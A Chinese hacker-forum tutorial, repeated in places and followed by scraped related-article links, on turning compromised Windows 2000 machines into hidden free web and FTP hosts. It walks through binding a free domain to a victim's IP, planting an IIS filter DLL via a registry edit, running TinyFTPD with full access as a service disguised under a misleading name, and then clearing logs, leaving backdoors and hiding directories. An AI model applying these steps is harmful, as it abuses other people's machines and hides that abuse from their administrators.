在肉鸡上构建一个完美的虚拟主机
2024-06-17 02:00:41
前一阶段rpc溢出漏洞流行的时候,我相信许多黑友手头上都储备了大量的3389肉鸡。大家都用肉鸡来做什么呢?做代理、做放黑软的ftp服务器、做网站、还是试验不同后门工具?更有无聊的人,像我整天用台湾肉鸡来申请QQ。好像这一切都玩得厌了,我来教大家玩一点新鲜的东东,用肉鸡来构建一个完美的可以隐藏的免费虚拟主机。
什么是虚拟主机呢?我在一家大规模的idc供应商的主页上查到如下定义:虚拟主机是使用特殊的软硬件技术,把一台运行在INTERNET上的主机分成一台台"虚拟"的主机,每一台虚拟主机都具有独立的域名,具有完整的Internet服务器(WWW、FTP、E-mail等)功能,虚拟主机之间完全独立,并可由用户自行管理。明白了定义,我们开工吧,在肉鸡上构建一个丝毫不逊于收费的虚拟主机。
第一,根据虚拟主机的定义,我们要有一个独立的域名。当然,这个域名不是像my.126.com那样的转向域名,而是可以和肉鸡ip地址绑定的域名。什么是绑定昵?通俗一点讲,像你有一个域名是www.hacker.com,那么你网站内所有的网页都可以用此域名指向表示,访问论坛可以用http://www.hacker.com/bbs,访问留言可以用http://www.hacker.com/guest,访问你想设的地址可以用http://www.hacker.com/你想设的url目录/等等。但是像126.com等的转向域名就不可以了,像我网站的域名是http://haiyangtop.126.com,但我无论如何不能用http://haiyangtop.126.com/bbs指向我放在任何空间上的论坛。那么独立的域名如何得到呢,难道我们要去买国际域名吗?不用的,可绑定的免费域名可以申请到的,请跟我来,打开http://www.ns.tc网站,点页面左栏的sign up now,申请一个你喜欢的域名吧。我申请的是lcx.ns.tc。
什么是虚拟主机呢?我在一家大规模的idc供应商的主页上查到如下定义:虚拟主机是使用特殊的软硬件技术,把一台运行在INTERNET上的主机分成一台台"虚拟"的主机,每一台虚拟主机都具有独立的域名,具有完整的Internet服务器(WWW、FTP、E-mail等)功能,虚拟主机之间完全独立,并可由用户自行管理。明白了定义,我们开工吧,在肉鸡上构建一个丝毫不逊于收费的虚拟主机。
第一,根据虚拟主机的定义,我们要有一个独立的域名。当然,这个域名不是像my.126.com那样的转向域名,而是可以和肉鸡ip地址绑定的域名。什么是绑定昵?通俗一点讲,像你有一个域名是www.hacker.com,那么你网站内所有的网页都可以用此域名指向表示,访问论坛可以用http://www.hacker.com/bbs,访问留言可以用http://www.hacker.com/guest,访问你想设的地址可以用http://www.hacker.com/你想设的url目录/等等。但是像126.com等的转向域名就不可以了,像我网站的域名是http://haiyangtop.126.com,但我无论如何不能用http://haiyangtop.126.com/bbs指向我放在任何空间上的论坛。那么独立的域名如何得到呢,难道我们要去买国际域名吗?不用的,可绑定的免费域名可以申请到的,请跟我来,打开http://www.ns.tc网站,点页面左栏的sign up now,申请一个你喜欢的域名吧。我申请的是lcx.ns.tc。
。不过要提醒你的是,申请的时候,最好不要用163.net的邮箱,会收不到发给你的密码的。我就申请了一个hacker.ns.tc的域名,注册是成功了,但却没有收到信,一个很好的域名做废了。申请成功后,用ns.tc发给你邮箱里的的密码登陆,在登陆后的页面里,写入你的一个肉鸡ip地址,点“renewal of an ip adress"按扭提交。
大约过几小时后,此绑定的域名就生效了,此时打开这个域名,会指向肉鸡的原有默认网站地址。我们当然不希望这样,申请的域名要指向自己放在肉鸡上的网站才可以呀。我们的工具主角登场了,银色巢穴有一款域名绑定软件,下载地址是:http://www.yscx.net/list.asp?id=71。我们先将此软件压缩包里的一个fmulti.dll和一个ff1.exe都传在肉鸡的%systemroot%system32目录下,记住一定要在这个目录下,这软件使用后才会生效;然后在肉鸡的注册表的HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters下,把Filter DLLs修改成为fmulti.dll的地址。
修改完后,再打开ff1.exe,在由上到下的输入框里依次填入域名、域名、你要放网站的目录。像我写的就是lcx.ns.tc、lcx.ns.tc和c:\winnt\system32\lcx。
输入完毕,用net命令重新启动一下W3SVC。
一切做完后,我在c:\winnt\system32\lcx目录下建一个default.htm默认首页,此首页的内容就是我网站的首页了,此时再打开lcx.ns.tc,你会发现什么?哈哈,一个绑定空间的域名生效了。在c:\winnt\system32\lcx这个目录下,我就可以放置我想放置的内容了。假如我放了一个动网论坛,位置是c:\winnt\system32\lcx\dwbbs,那么我就可以用http://lcx.ns.tc/dwbbs/index.asp直接来访问此论坛,这样访问是不是比你用转向域 名跳转后在ie地址栏里显示一大串的url地址酷很多?当然,要说明的是,我们在做这一切的前提是肉鸡是w2k系统,默认装了iis管理器,并且开了一个80端口的web服务,只有这样,我们做的绑定域名才会有效,而且我们做的虚拟主机是支持asp程序的。
第二,根据虚拟主机的定义,我们做的虚拟主机还要具有完整的Internet服务器(WWW、FTP、E-mail等)功能。此时,我们的lcx.ns.tc虚拟主机已具备了www的功能,你可以用http://lcx.ns.tc访问到的。我们再给其做上一个ftp功能,这个虚拟主机就很完美了。hotmail写了一个很小的ftp服务器TinyFTPD,目前最高版本是1.4。不过,它只是一个命令行的工具,在肉鸡上配置使用过后,如果再退出了肉鸡的话,它就不会生效了。我们还需要一个工具ntsrv,将TinyFTPD配置成服务状态来使用。我们先来了解一下TinyFTPD是如何工作的,我们将其传在肉鸡上,执行如下命令:TinyFTPD 2121 55555 lcx 12346 c:\winnt\system32\lcx all -hide。意思是说在肉鸡上建了一个ftp服务器,端口是2121,监听端口是55555,用户名是lcx,密码是123456,ftp的服务器目录是c:\winnt\system32\lcx(这里要和lcx.ns.tc的www目录对应,这样才会有虚拟主机的味道),all是具有所有的写入修改删除下载等权限,-hide指关掉cmd对话框该命令仍然执行。(详细使用方法请自行看帮助吧)。
第二,根据虚拟主机的定义,我们做的虚拟主机还要具有完整的Internet服务器(WWW、FTP、E-mail等)功能。此时,我们的lcx.ns.tc虚拟主机已具备了www的功能,你可以用http://lcx.ns.tc访问到的。我们再给其做上一个ftp功能,这个虚拟主机就很完美了。hotmail写了一个很小的ftp服务器TinyFTPD,目前最高版本是1.4。不过,它只是一个命令行的工具,在肉鸡上配置使用过后,如果再退出了肉鸡的话,它就不会生效了。我们还需要一个工具ntsrv,将TinyFTPD配置成服务状态来使用。我们先来了解一下TinyFTPD是如何工作的,我们将其传在肉鸡上,执行如下命令:TinyFTPD 2121 55555 lcx 12346 c:\winnt\system32\lcx all -hide。意思是说在肉鸡上建了一个ftp服务器,端口是2121,监听端口是55555,用户名是lcx,密码是123456,ftp的服务器目录是c:\winnt\system32\lcx(这里要和lcx.ns.tc的www目录对应,这样才会有虚拟主机的味道),all是具有所有的写入修改删除下载等权限,-hide指关掉cmd对话框该命令仍然执行。(详细使用方法请自行看帮助吧)。
明白了这些,我再来讲解用ntsrv将TinyFTPD命令如何来配置成服务启动。我们先来用记事本写一个ntsrv.ini,内容如下:
[Settings]
ServiceName = NETWORK JAVA
LogEnable = 0
ProcCount = 1
[Process0]
CommandLine =TinyFTPD.exe 21 55555 lcx 12346 C:\winnt\system32\lcx all -hide
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
第二行的NETWORK JAVA指的是你指定的服务名,你可以起个更艺术的可以迷惑肉鸡管理员的服务名字,使其不敢轻易删掉此服务。第三行的LogEnable = 0中的0表示程序不会自动生成一个日志,如果是1就会生成一个叫ntsrv.log的文件,里面记录了服务启动及启动配置文件中的程序情况。第三行ProcCount = 1表示只有一个程序加载在服务里。第六行你已经明白了,最后一行表示程序执行时会在后台被执行,其它行一切默认即可以了。ntsrv.ini配置好了以后,我们与ntsrv.exe放在一起一块传至肉鸡的c:\winnt\system32下,执行ntsrv -install、net start "你在ntsrv.ini配置的服务名"这两个命令后,肉鸡的ftp服务器配置好了。
[Settings]
ServiceName = NETWORK JAVA
LogEnable = 0
ProcCount = 1
[Process0]
CommandLine =TinyFTPD.exe 21 55555 lcx 12346 C:\winnt\system32\lcx all -hide
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
第二行的NETWORK JAVA指的是你指定的服务名,你可以起个更艺术的可以迷惑肉鸡管理员的服务名字,使其不敢轻易删掉此服务。第三行的LogEnable = 0中的0表示程序不会自动生成一个日志,如果是1就会生成一个叫ntsrv.log的文件,里面记录了服务启动及启动配置文件中的程序情况。第三行ProcCount = 1表示只有一个程序加载在服务里。第六行你已经明白了,最后一行表示程序执行时会在后台被执行,其它行一切默认即可以了。ntsrv.ini配置好了以后,我们与ntsrv.exe放在一起一块传至肉鸡的c:\winnt\system32下,执行ntsrv -install、net start "你在ntsrv.ini配置的服务名"这两个命令后,肉鸡的ftp服务器配置好了。
(附此两个小工具的下载地址:http://haiyangtop.uni.cc/xnzj.rar)
第三,收尾工作。我们的lcx.ns.tc的虚拟主机已经配置完毕了,如果你想再做上一个email服务器也不是不可以的,网上也有很多小巧精致的email服务器软件,像IMailt和EasyMail、ArGoSoft等等,但我觉得已经没有必要了,这个虚拟主机足够我们用的了。做完了虚拟主机,当然随之而来的工作是清除日志,打好肉鸡安全隐患的补丁,再留几个好后门了,最重要的是隐藏好你的网站目录,一般用一个"attrib +h +s 你的目录"就可以隐藏了,但这一切就不在本文的讨论范围之内了。最后,我可要提醒你,如果你有重要文件放在肉鸡的虚拟主机上,可以记得经常备份哟,丢了的话lcx可不负责。
本篇文章来源于[华盟***帝国 - 中国最权威***培训中心], 原文链接:http://www.hm112.com/n/?15831.html
第三,收尾工作。我们的lcx.ns.tc的虚拟主机已经配置完毕了,如果你想再做上一个email服务器也不是不可以的,网上也有很多小巧精致的email服务器软件,像IMailt和EasyMail、ArGoSoft等等,但我觉得已经没有必要了,这个虚拟主机足够我们用的了。做完了虚拟主机,当然随之而来的工作是清除日志,打好肉鸡安全隐患的补丁,再留几个好后门了,最重要的是隐藏好你的网站目录,一般用一个"attrib +h +s 你的目录"就可以隐藏了,但这一切就不在本文的讨论范围之内了。最后,我可要提醒你,如果你有重要文件放在肉鸡的虚拟主机上,可以记得经常备份哟,丢了的话lcx可不负责。
本篇文章来源于[华盟***帝国 - 中国最权威***培训中心], 原文链接:http://www.hm112.com/n/?15831.html
转载于:https://blog.51cto.com/dongbian/703031
在肉鸡上构建一个完美的虚拟主机相关推荐
- 如何在阿里云上构建一个合适的Kubernetes集群
摘要: 声明 本文主要介绍如何在阿里云上构建一个K8S集群的实践,只是作为参考,大家可以根据实际情况做出调整. 集群规划 在实际案例中发现,有不少同学使用了很多的小规格的ECS来构建K8S集群,这样其 ...
- 在CentOS 8上安装与配置Apache虚拟主机
实验环境 操作系统:Centos 8 web应用:apache 内网IP:192.168.3.21 shell执行:root 以root或具有sudo权限的用户身份登录执行如下操作. 主配置文件路径: ...
- php配置本地一个新的虚拟主机
php配置本地一个新的虚拟主机 找到Apache的配置文件 httpd-conf 打开该文件找到 Include conf/extra/httpd-vhosts.conf 去掉该内容前面的# 表示开启 ...
- sas模拟试验构建线性模型_在sas上构建一个有角度的Web应用程序
sas模拟试验构建线性模型 The SAS platform is unparalleled in its capability to deliver analytics across the wor ...
- Figma: 如何在 Web 上构建一个插件系统
原文:https://www.figma.com/blog/how-we-built-the-figma-plugin-system/ 翻译:https://juejin.cn/post/684490 ...
- iframe如何发送请求_【第1803期】如何在 Web 上构建一个插件系统
前言 上周末的这篇新闻[译]WebAssembly 1.0成为W3C推荐标准,也是在浏览器中运行的第四种语言不知道你注意到了吗?今日早读文章由@夏华翻译分享,本文由@刘岩推荐. 正文从这开始-- 在 ...
- Linux上构建一个RADIUS服务器详解
作为一名网络管理员,您需要为您所需管理的每个网络设备存放用于管理的用户信息.但是网络设备通常只支持有限的用户管理功能.学习如何使用Linux上的一个外部RADIUS服务器来验证用户,具体来说是通过一个 ...
- 网站设计好怎么上传到服务器的,虚拟主机上传到网站的几个步骤
虚拟主机怎么上传到网站?站长们可以利用专业的软件协助自己上传,比如专业的ftp软件,具备支持续点相传,上传,以及下载目录等等,不会将限制过长的网站剔除,还可以下载列队,可以长传到本地,显示隐形软件,或 ...
- lqc_构建基于域名的虚拟主机
基于域名的虚拟web主机 实验环境: 某公司的网站服务器使用的公网IP地址为192.168.100.150,并使用该IP地址注册两个域名www.bdqn.com和www.jbit.com.服务器中已经 ...
- Web 新租用了一个域名和虚拟主机
为了更好地验证一些想法,租了一个域名和一个虚拟主机,租期一年,耗资¥106. 域名是wawl.wang或者www.wawl.wang,都可以访问,取我爱物联网之意.目前还没有什么内容,处于备案审核阶段 ...
最新文章
- 平面广告设计和Web设计的差别
- 北航、旷视联合,打造最强实时语义分割网络
- 基于JSP实现人力资源管理系统
- vscode私钥设置_VSCode远程开发配置指南
- 2019汇总之从4个关键词看单细胞与肝癌文献
- 电子科大计算机学院毕业照,电子科大毕业照拍摄指南,请内部传阅!
- 10 CO配置-控制-成本中心会计-定义成本中心类别
- jQuery中bind,live,delegate与one方法的用法及区别
- 什么是网络计算机有什么优点,ISDN是什么?它有什么优点?
- Quartz.Net 2.0 bate1 使用
- uva 540 (Team Queue UVA - 540)
- FISCO BCOS(三)——— 部署及调用HelloWorld合约
- 高等数学笔记:两个重要极限
- java 熄灯问题_C++基础算法学习——熄灯问题
- java微信投票_微信小程序投票功能
- 你需要知道的关于元宇宙NFT平台艺术数字藏品交易的一切
- 三位数自动递增编号函数_EXCEL中序号自动增加(如何避免隐藏行)?excel自动填充序号...
- 京东大数据方向-Java方向-实习面经一面二面(offer没去。。。)
- 在家如何用手机赚钱,小编来为你一一解答!
- 全球及中国吊臂汽车起重机行业研究及十四五规划分析报告
热门文章
- python爬小说收费章节_python 多线程爬小说返回章节乱套。求解
- clob字段怎么导出_人人都会遇到的问题:Java 如何优雅的导出 Excel~
- pandas 日期比较大小_计算pandas Dataframe中的日期时间差异
- C# datagridview绑定Liststring显示的是数据长度
- Apache构建虚拟web主机
- 注意!思科Aironet 1830和1850系列存在硬编码密码,请尽快修复!
- vc有关 directx组态,和dxsdk_extras(directshow)
- 在lamp环境下搭建多种论坛(下)
- About “condition variables”
- 组建Forefront TMG独立陈列(上)-案例介绍与服务器准备